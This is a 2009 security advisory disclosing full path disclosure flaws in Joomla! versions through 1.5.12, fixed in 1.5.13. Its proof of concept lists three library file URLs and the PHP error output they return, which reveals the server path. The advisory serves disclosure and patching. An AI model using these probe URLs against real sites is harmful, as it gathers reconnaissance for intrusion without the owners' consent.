[ISecAuditors Security Advisories] Joomla! < 1.5.12 Multiple Full Path Disclosure vulnerabilities

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-009
- Original release date: July 21st, 2009
- Last revised:  July 23rd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Joomla! < 1.5.12 Multiple Full Path Disclosure vulnerabilities

II. BACKGROUND
-------------------------
Joomla! is an award-winning content management system (CMS), which
enables you to build Web sites and powerful online applications. Many
aspects, including its ease-of-use and extensibility, have made
Joomla! the most popular Web site software available. Best of all,
Joomla! is an open source solution that is freely available to everyone.

III. DESCRIPTION
-------------------------
This vulnerability could allow a malicious user to view the internal
path information of the host due to some files were missing the check
for JEXEC.

IV. PROOF OF CONCEPT
-------------------------
The attacker can get the full path of the instalation of Joomla!
browsing to any of this urls:

http://example.com/joomla-1.5.12/libraries/joomla/utilities/compat/php50x.php
http://example.com/joomla-1.5.12/libraries/joomla/client/ldap.php
http://example.com/joomla-1.5.12/libraries/joomla/html/html/content.php

The information obtained contais the full path to the files:

<b>Parse error</b>:  syntax error, unexpected T_CLONE, expecting
T_STRING in
<b>/var/www/joomla-1.5.12/libraries/joomla/utilities/compat/php50x.php</b>
on line <b>100</b><br />
<b>Fatal error</b>:  Class JObject not found in
<b>/var/www/joomla-1.5.12/libraries/joomla/client/ldap.php</b> on line
<b>21</b><br />
<b>Fatal error</b>:  Class JLoader not found in
<b>/var/www/joomla-1.5.12/libraries/joomla/html/html/content.php</b>
on line <b>15</b><br />

V. BUSINESS IMPACT
-------------------------
Full path disclosure vulnerabilities enables an attacker to know the
path to the web root. This information can be used in order to launch
further attacks.

VI. SYSTEMS AFFECTED
-------------------------
Joomla! versions prior and including 1.5.12 are vulnerable.

VII. SOLUTION
-------------------------
Upgrade to version 1.5.13

VIII. REFERENCES
-------------------------
http://www.joomla.org
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
July  21, 2009: Initial release.
July  23, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
July  21, 2009: Discovered by Internet Security Auditors.
July  21, 2009: Vendor contacted.
July  22, 2009: Joomla! publish update. Great job.
July  24, 2009: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.